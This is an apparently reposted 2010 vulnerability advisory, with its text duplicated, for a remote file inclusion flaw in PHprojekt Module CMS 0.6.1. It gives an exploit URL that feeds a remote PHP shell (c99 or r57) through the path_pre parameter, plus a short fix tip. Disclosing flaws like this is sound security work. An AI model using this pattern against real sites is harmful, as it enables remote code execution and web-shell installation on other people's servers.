PHprojekt Module CMS 0.6.1 Remote File Inclusion Vulnerability

2010-06-03 16:03:13


####################################################################
## ##
##

####################################################################
## ##
## PHprojekt Module CMS 0.6.1 Remote File Inclusion Vulnerability ##
## ##
## Discovered by bd0rk ##
## ##
## Date: 2010/06/02 ##
## ##
####################################################################



[~] Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com

[~] Vendor: http://www.mariovaldez.net/

[~] Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.zip



.:: SOH-Crew Website: www.soh-crew.it.tt ::.


Greetings: TheJT, Mario, Enrico, Dirk, x0r_32, GolD_M, SecurityFocus-Team and EAB


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[+] Exploit: http://[somehost]/cm/cm_navigation.inc.php?path_pre=[SHELLCODE]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Description: The $path_pre parameter in file cm_navigation.inc.php isn't declared before
include_once and no .htaccess-file is about it. So an attacker can execute
some php-shellcode (c99 or r57 for example) about it.



Fixtip for users: Please declare the $path_pre parameter or use Hacking-Attempt!



#### The 21 years old, german Hacker bd0rk #### <= white-hat :-)





##
## ##
## Discovered by bd0rk ##
## ##
## Date: 2010/06/02 ##
## ##
####################################################################



[~] Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com

[~] Vendor: http://www.mariovaldez.net/

[~] Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.zip



.:: SOH-Crew Website: www.soh-crew.it.tt ::.


Greetings: TheJT, Mario, Enrico, Dirk, x0r_32, GolD_M, SecurityFocus-Team and EAB


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[+] Exploit: http://[somehost]/cm/cm_navigation.inc.php?path_pre=[SHELLCODE]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Description: The $path_pre parameter in file cm_navigation.inc.php isn't declared before
include_once and no .htaccess-file is about it. So an attacker can execute
some php-shellcode (c99 or r57 for example) about it.



Fixtip for users: Please declare the $path_pre parameter or use Hacking-Attempt!



#### The 21 years old, german Hacker bd0rk #### <= white-hat :-)

Fixes

No fixes

In order to submit a new fix you need to be registered.